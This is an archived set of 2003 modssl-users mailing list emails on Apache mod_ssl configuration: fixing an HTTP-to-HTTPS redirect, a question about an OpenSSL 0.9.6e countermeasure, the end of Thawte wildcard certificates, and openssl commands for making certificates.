Message-ID: <26c201c2bec0$b319b580$0104000a@jumpstartpromotions.com>
From: "Jeff" 
To: 
References: <3E28DA70.1070801@sancho2k.net>
Subject: Re: HTTP --> HTTPS rewrite not working
Date: Sat, 18 Jan 2003 17:10:32 +1000
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4920.2300
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4920.2300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Well, you have the ReWrite rule INSIDE the destination SSL VH config..  A
bit useless..

The ReWrite needs to be inside the VH configs that NEED to redirect - such
as 10.0.0.40:80, Servername family.sancho2k.net

As for why http://family.sancho2k.net is sending a webpage with a meta-tag
redirect - What is actually being server for that address ???
It is probably your default page you have put there..

Rgds
Jeff

----- Original Message -----
From: "Sancho2k.net Lists" 
To: 
Sent: Saturday, January 18, 2003 2:39 PM
Subject: HTTP --> HTTPS rewrite not working


> Greetz all,
>
> I'm trying to force one of my virtual hosts to use https when http is
> requested by a mod_rewrite rule. I am testing the implementation using
> curl.
>
> When I specify https in my url, curl will grab the correct page:
>
> [root@molodetz:~]# curl https://family.sancho2k.net
>
> 
> 
> 
> 
> Sancho2k.net Family - Our family web page
>
> But when I throw http://family.sancho2k.net ...
>
> [root@molodetz:~]# curl http://family.sancho2k.net
> 
>
> This is my VirtualHost configuration:
>
> NameVirtualHost 10.0.0.40:443
> 
>      ServerName                  family.sancho2k.net
>      DocumentRoot                /var/www/htdocs/fam_public_html
>      ServerAdmin                 sancho@sancho2k.net
>      CustomLog                   logs/family/access_log combined
>      ErrorLog                    logs/family/error_log
>      TransferLog                 logs/family/ssl_access_log
>      LogLevel                    debug
>      SSLEngine                   on
>      SSLCertificateFile          /var/www/conf/certs/family/server.crt
>      SSLCertificateKeyFile       /var/www/conf/certs/family/server.key
>      UseCanonicalName            off
>      RewriteEngine               on
>      RewriteCond                 %{SERVER_PORT}   !^443$
>      RewriteRule                 ^/(.*)   https://%{SERVER_NAME}/$1 [L,R]
>      #SSLVerifyClient            require
>      #SSLVerifyDepth             1
>      #SSLCACertificateFile       conf/certs/cacert.crt
> 
>
> Why is it redirecting my requests to www.sancho2k.net? This is a
> seperate virtual host I have set up:
>
> NameVirtualHost 10.0.0.2:80
> 
>      ServerName                  www.sancho2k.net
>      DocumentRoot                /var/www/htdocs
>      ServerAdmin                 webmaster@sancho2k.net
>      SSLEngine                   off
> 
>
>
> Thanks in advance for help.
>
> DS
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jan 18 11:27:57 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BC0982AA0B7; Sat, 18 Jan 2003 11:27:57 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 95FB52AA0A8
	for ; Sat, 18 Jan 2003 11:27:53 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id BC3FB6E40B7; Sat, 18 Jan 2003 11:29:48 +0100 (CET)
Date: Sat, 18 Jan 2003 11:29:48 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: HTTP --> HTTPS rewrite not working
Message-ID: <20030118102947.GA28866@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <3E28DA70.1070801@sancho2k.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3E28DA70.1070801@sancho2k.net>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Jan 17, 2003 at 09:39:12PM -0700, Sancho2k.net Lists wrote:
> NameVirtualHost 10.0.0.40:443
> 
[SNIP]
>     RewriteEngine               on
>     RewriteCond                 %{SERVER_PORT}   !^443$

This will never happen because you're already inside the Port 443
vhost container. 
> 
> NameVirtualHost 10.0.0.2:80
> 
>     ServerName                  www.sancho2k.net

Redirect / https://family.sancho2k.net

No real need to use mod_rewrite for that.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jan 19 06:50:32 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 75EFD2AA0B7; Sun, 19 Jan 2003 06:50:32 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from rcpt-expgw.biglobe.ne.jp (rcpt-expgw.biglobe.ne.jp [202.225.89.140])
	by master.modssl.org (Postfix) with ESMTP id 084612AA09E
	for ; Sun, 19 Jan 2003 06:50:27 +0100 (CET)
Received: from smtp-gw.biglobe.ne.jp
	by rcpt-expgw.biglobe.ne.jp (mnmy/5508310702) with ESMTP id h0J5oCP10614
	for ; Sun, 19 Jan 2003 14:50:12 +0900 (JST)
X-Biglobe-Sender: 
Received: from DIVINE.msd.biglobe.ne.jp (211.123.200.2 [211.123.200.2]) by smtp-gw.biglobe.ne.jp
	id OALBC0A8264E; Sun, 19 Jan 2003 14:50:10 +0900 (JST)
Message-Id: <5.0.2.7.2.20030119144227.041e47f0@msd.biglobe.ne.jp>
X-Sender: junx@msd.biglobe.ne.jp
X-Mailer: QUALCOMM Windows Eudora Version 5.0.2-Jr2
Date: Sun, 19 Jan 2003 14:50:08 +0900
To: modssl-users@modssl.org
From: Jun 
Subject: our apache+mod_ssl server vulnerable?
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jun 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi, 

My question is whether our www server has a critical vulnerability or not.
If someone knows it, please tell me.

We are using apache1.3.27 mod_ssl 2.8.12 with OpenSSL0.9.6e on HP-UX11.0.
I think mod_ssl of this version with default settings would disable 
a countermeasure to OpenSSL0.9.6's vulnerability.

Why I think so is that an option SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS 
has been added in OpenSSL 0.9.6e and mod_ssl looks using this option.

We'd like to use the above www server because some www browser on Cellerphone
in Japan cannot establish SSL connection to a www server which doesn't use 
the option.

Regards

---
J.Arakawa 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jan 19 23:41:24 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9F5D62AA0A9; Sun, 19 Jan 2003 23:41:24 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.sancho2k.net (spruell.dsl.xmission.com [166.70.24.187])
	by master.modssl.org (Postfix) with SMTP id 3709A2AA085
	for ; Sun, 19 Jan 2003 23:41:22 +0100 (CET)
Received: (qmail 2216 invoked from network); 19 Jan 2003 22:41:40 -0000
Received: from win2kpro.sancho2k.net (HELO sancho2k.net) (10.0.0.3)
  by 0 with SMTP; 19 Jan 2003 22:41:40 -0000
Message-ID: <3E2B2CFB.2000806@sancho2k.net>
Date: Sun, 19 Jan 2003 15:55:55 -0700
From: "Sancho2k.net Lists" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: HTTP --> HTTPS rewrite not working
References: <3E28DA70.1070801@sancho2k.net> <20030118102947.GA28866@toftum.dk>
In-Reply-To: <20030118102947.GA28866@toftum.dk>
X-Enigmail-Version: 0.71.0.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Sancho2k.net Lists" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Mads Toftum wrote:
> This will never happen because you're already inside the Port 443
> vhost container. 

Stupid oversight on my behalf. Thanks to those that pointed this out.

> 
>>NameVirtualHost 10.0.0.2:80
>>
>>    ServerName                  www.sancho2k.net
> 
> 
> Redirect / https://family.sancho2k.net
> 
> No real need to use mod_rewrite for that.

And it works with the simple redirect. Surprisingly, most of the howtos 
and internet resources I find suggest using mod_rewrite to direct all 
requests to the SSL site. Thanks for the clarification.

> 
> vh
> 
> Mads Toftum

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 20 10:25:09 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 71FDD2AA0B1; Mon, 20 Jan 2003 10:25:09 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id ECE5A2AA09C
	for ; Mon, 20 Jan 2003 10:25:06 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h0K9Sk626251
	for ; Mon, 20 Jan 2003 09:29:07 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Mon, 20 Jan 2003 09:24:28 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F257A@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: Wildcard Certs
Date: Mon, 20 Jan 2003 09:24:24 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

That's interesting! We still have a wildcard certificate (check it out at
https://wwws.rnib.org.uk/donation.htm) which we received back on the 16th
July. Thawte have been making it difficult to get them, since although they
save on administration and allow you limited NBVH to a single IP, they were
losing money by issuing them. We had to give a statement last year on how
many sites we'd run it on and agreed a price for them.

I will check with my contacts within Thawte and get a definitive response.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

"I know it sounds cocky, but I honestly believe that one day there'll be a
telephone in every Town in America" - Alexander Graham Bell (my paraphrase)



> -----Original Message-----
> From: Mads Toftum [mailto:mads@toftum.dk]
> Sent: 16 January 2003 14:18
> To: modssl-users@modssl.org
> Subject: Wildcard Certs
> 
> 
> Wildcard certs have been discussed here on the list recently and
> Thawte has been mentioned as the place to buy wildcard certs. 
> We decided to check and got the following answer:
> 
> ---------------------------------------------------------------------
> We unfortunately discontinued the wild cards certs about 8 
> months ago                                                    
>                       and no                                  
>                                                               
>                                          longer issue them.   
>                                                               
>                                                               
>                                                               
>                                                               
>                  You would have to apply for each SSL individually.  
> ---------------------------------------------------------------------
> 
> So neither Thawte or Verisign (who own Thawte) issue wildcard certs.
> 
> vh
> 
> Mads Toftum
> -- 
> `Darn it, who spiked my coffee with water?!' - lwall
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 20 10:43:51 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4DBEB2AA0B1; Mon, 20 Jan 2003 10:43:51 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id ACE3B2AA09C
	for ; Mon, 20 Jan 2003 10:43:49 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h0K9lT627320
	for ; Mon, 20 Jan 2003 09:47:50 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Mon, 20 Jan 2003 09:43:11 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F257D@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: Wildcard Certs
Date: Mon, 20 Jan 2003 09:43:03 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

There is information on the Thawte site to say that these are now =
issued by
Verisign. This page
http://www.verisign.com/resources/gd/buildEcommerce/certificates.html

Says:

=A3Name-Based Virtual Hosting: An ISP or Web Host provides each hosted
customer with a unique domain name, such as customername.isp.com.
If the same certificate is used for each domain name, browsers will =
indicate
that the site domain name does not match the common name in the =
certificate.
To solve this problem, a "wildcard" certificate of the form *.isp.com =
is
required to properly serve the multi-hostname configuration without =
creating
browser mismatch error messages. (VeriSign offers wildcard certificates =
on a
case-by-case basis, and they are subject to certain additional =
licensing
terms and conditions. For more information, please contact
shared-ssl@verisign.com.)"

This is similar to the position that Thawte had regarding wildcard
certificates when we renewed last year.=20

I'll post exact details when I get them.

-=20
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of =
the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 =
John.Airey@rnib.org.uk=20

"I know it sounds cocky, but I honestly believe that one day there'll =
be a
telephone in every Town in America" - Alexander Graham Bell (my =
paraphrase)



> -----Original Message-----
> From: Mads Toftum [mailto:mads@toftum.dk]
> Sent: 16 January 2003 14:18
> To: modssl-users@modssl.org
> Subject: Wildcard Certs
>=20
>=20
> Wildcard certs have been discussed here on the list recently and
> Thawte has been mentioned as the place to buy wildcard certs.=20
> We decided to check and got the following answer:
>=20
> ---------------------------------------------------------------------
> We unfortunately discontinued the wild cards certs about 8=20
> months ago                                                   =20
>                       and no                                 =20
>                                                              =20
>                                          longer issue them.  =20
>                                                              =20
>                                                              =20
>                                                              =20
>                                                              =20
>                  You would have to apply for each SSL individually. =20
> ---------------------------------------------------------------------
>=20
> So neither Thawte or Verisign (who own Thawte) issue wildcard certs.
>=20
> vh
>=20
> Mads Toftum
> --=20
> `Darn it, who spiked my coffee with water?!' - lwall
>=20
> =
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   =
www.modssl.org
> User Support Mailing List                      =
modssl-users@modssl.org
> Automated List Manager                            =
majordomo@modssl.org
>=20

-=20

NOTICE: The information contained in this email and any attachments is=20
confidential and may be legally privileged. If you are not the=20
intended recipient you are hereby notified that you must not use,=20
disclose, distribute, copy, print or rely on this email's content. If=20
you are not the intended recipient, please notify the sender=20
immediately and then delete the email and any attachments from your=20
system.

RNIB has made strenuous efforts to ensure that emails and any=20
attachments generated by its staff are free from viruses. However, it=20
cannot accept any responsibility for any viruses which are=20
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email=20
and any attachments are those of the author and do not necessarily=20
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk=20
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 20 13:08:22 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 172F62AA09D; Mon, 20 Jan 2003 13:08:22 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id A71092AA08F
	for ; Mon, 20 Jan 2003 13:08:20 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h0KCC1605078
	for ; Mon, 20 Jan 2003 12:12:21 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Mon, 20 Jan 2003 12:07:42 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F258C@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: Wildcard Certs
Date: Mon, 20 Jan 2003 12:07:32 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Here are the exact details as promised. 

Thawte stopped issuing wildcard certificates on August 28th 2002. They say
that Verisign have always done them and still do them (see my previous
post). I can give details of individuals within the company if anyone needs
to verify this for themselves. 

It looks highly likely that this will be the first year since 1998 that we
don't continue with wildcard certificates and go back to managing
certificates individually.

Thanks for raising this one Mads. Hopefully the position is now clear.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

"I know it sounds cocky, but I honestly believe that one day there'll be a
telephone in every Town in America" - Alexander Graham Bell (my paraphrase)



> -----Original Message-----
> From: Mads Toftum [mailto:mads@toftum.dk]
> Sent: 16 January 2003 14:18
> To: modssl-users@modssl.org
> Subject: Wildcard Certs
> 
> 
> Wildcard certs have been discussed here on the list recently and
> Thawte has been mentioned as the place to buy wildcard certs. 
> We decided to check and got the following answer:
> 
> ---------------------------------------------------------------------
> We unfortunately discontinued the wild cards certs about 8 
> months ago                                                    
>                       and no                                  
>                                                               
>                                          longer issue them.   
>                                                               
>                                                               
>                                                               
>                                                               
>                  You would have to apply for each SSL individually.  
> ---------------------------------------------------------------------
> 
> So neither Thawte or Verisign (who own Thawte) issue wildcard certs.
> 
> vh
> 
> Mads Toftum
> -- 
> `Darn it, who spiked my coffee with water?!' - lwall
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 21 16:56:30 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 903D02AA0AB; Tue, 21 Jan 2003 16:56:30 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from scaup.mail.pas.earthlink.net (scaup.mail.pas.earthlink.net [207.217.120.49])
	by master.modssl.org (Postfix) with ESMTP id 901752AA085
	for ; Tue, 21 Jan 2003 16:56:28 +0100 (CET)
Received: from bigbird.psp.pas.earthlink.net ([207.217.78.244])
	by scaup.mail.pas.earthlink.net with esmtp (Exim 3.33 #1)
	id 18b0lB-0006ed-00
	for modssl-users@modssl.org; Tue, 21 Jan 2003 07:56:21 -0800
Received: from [134.9.11.140] by EarthlinkWAM via HTTP; Tue Jan 21 07:56:21 PST 2003
Message-ID: <5044482.1043164581706.JavaMail.nobody@bigbird.psp.pas.earthlink.net>
Date: Tue, 21 Jan 2003 07:56:22 -0800 (PST)
From: cy user 
To: modssl-users@modssl.org
Subject: Create new SSL certificate for https
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Mailer: Earthlink Web Access Mail version 3.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: cy user 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I need to create new certificate's for my apache server. I'm a little confused on how to do this. Does anyone have a good link they can tell me or anything.

Thanks
Rob
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 21 17:15:37 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9FF872AA0AF; Tue, 21 Jan 2003 17:15:37 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from enroque.rawbyte.com (adsl-63-192-218-231.dsl.snfc21.pacbell.net [63.192.218.231])
	by master.modssl.org (Postfix) with ESMTP id A18B02AA081
	for ; Tue, 21 Jan 2003 17:15:29 +0100 (CET)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id F34182C456; Tue, 21 Jan 2003 08:03:34 -0800 (PST)
Date: Tue, 21 Jan 2003 08:03:34 -0800
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: Create new SSL certificate for https
Message-ID: <20030121160334.GA17556@rawbyte.com>
References: <5044482.1043164581706.JavaMail.nobody@bigbird.psp.pas.earthlink.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <5044482.1043164581706.JavaMail.nobody@bigbird.psp.pas.earthlink.net>
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> I need to create new certificate's for my apache server. I'm a little
confused on how to do this. Does anyone have a good link they can tell me or
anything.  

This should give you a good understanding of certificates and how to use the
openssl command line tool to manage them:
http://apacheworld.org/ty24/site.chapter17.html

Best regards

Daniel
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 21 17:19:16 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2C01B2AA09A; Tue, 21 Jan 2003 17:19:16 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from gonzaga.cesar.org.br (gonzaga.cesar.org.br [200.199.23.120])
	by master.modssl.org (Postfix) with SMTP id 1F33B2AA081
	for ; Tue, 21 Jan 2003 17:19:13 +0100 (CET)
Received: (qmail 71206 invoked from network); 21 Jan 2003 15:52:12 -0000
Received: from unknown (HELO melbar) (127.0.0.1)
  by localhost with SMTP; 21 Jan 2003 15:52:12 -0000
From: "Marco \"Kiko\" Carnut" 
To: 
Subject: RE: Create new SSL certificate for https
Date: Tue, 21 Jan 2003 13:21:13 -0300
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
In-Reply-To: <5044482.1043164581706.JavaMail.nobody@bigbird.psp.pas.earthlink.net>
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Marco \"Kiko\" Carnut" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Rob,

> I need to create new certificate's for my apache server. I'm a 
> little confused on how to do this. Does anyone have a good link 
> they can tell me or anything.

A simple and very fast way to do it for testing purposes is to
use FreeICP project's free entry-level CA:

   https://ca.freeicp.org/webra/entry-level

Just type your server's address (www.yourserver.com or whatever)
and it'll generate the private key and public certificate for you
right on the spot. Save them to files and point the mod_ssl
SSLCertificateFile and SSLCertificateKeyFile to them. I assume you
can handle the httpd.conf part.

Albeit all that works, this is not very secure. When you move
your server to production status, you should get a higher security
grade certificate.  Unfortunately, the FreeICP project's Verified
Identity CA is still not offering server certificates -- this is
still being implemented to fit their free/collaborative identity
verification system; so, for the time being, you should try one of
the commercial CAs (VeriSign, Thawte, etc).

--Marco "Kiko" Carnut
--Tempest Security Technologies/FreeICP.ORG

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 21 17:28:46 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 917F72AA09A; Tue, 21 Jan 2003 17:28:46 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from me.homelinux.net (cmb3-218.dial-up.arnes.si [194.249.40.218])
	by master.modssl.org (Postfix) with ESMTP id 3C8A22AA081
	for ; Tue, 21 Jan 2003 17:28:39 +0100 (CET)
Received: from Spooler by me.homelinux.net (Mercury/32 v3.32) ID MO0000B9;
    21 Jan 03 17:28:31 +0100
Received: from spooler by me.homelinux.net (Mercury/32 v3.32); 21 Jan 03 17:28:17 +0100
Received: from stupar.homelinux.net (192.168.10.1) by Orel (Mercury/32 v3.32) with ESMTP ID MG0000B8;
   21 Jan 03 17:28:10 +0100
Message-ID: <3E2D7526.9000606@stupar.homelinux.net>
Date: Tue, 21 Jan 2003 17:28:22 +0100
From: Sasa STUPAR 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; sl-SI; rv:1.0.2) Gecko/20021120 Netscape/7.01
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Create new SSL certificate for https
References: <5044482.1043164581706.JavaMail.nobody@bigbird.psp.pas.earthlink.net>
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms000701020108080402040803"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sasa STUPAR 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms000701020108080402040803
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit

use this command:

openssl req -config openssl.cnf -new -out xxx.csr
openssl rsa -in privkey.pem -out xxx.key
openssl x509 -in xxx.csr -out xxx.cert -req -signkey xxx.key -days 365
openssl x509 -in xxx.cert -out xxx.der.crt -outform DER

cy user a écrit:
> I need to create new certificate's for my apache server. I'm a little confused on how to do this. Does anyone have a good link they can tell me or anything.
> 
> Thanks
> Rob
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


--------------ms000701020108080402040803
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
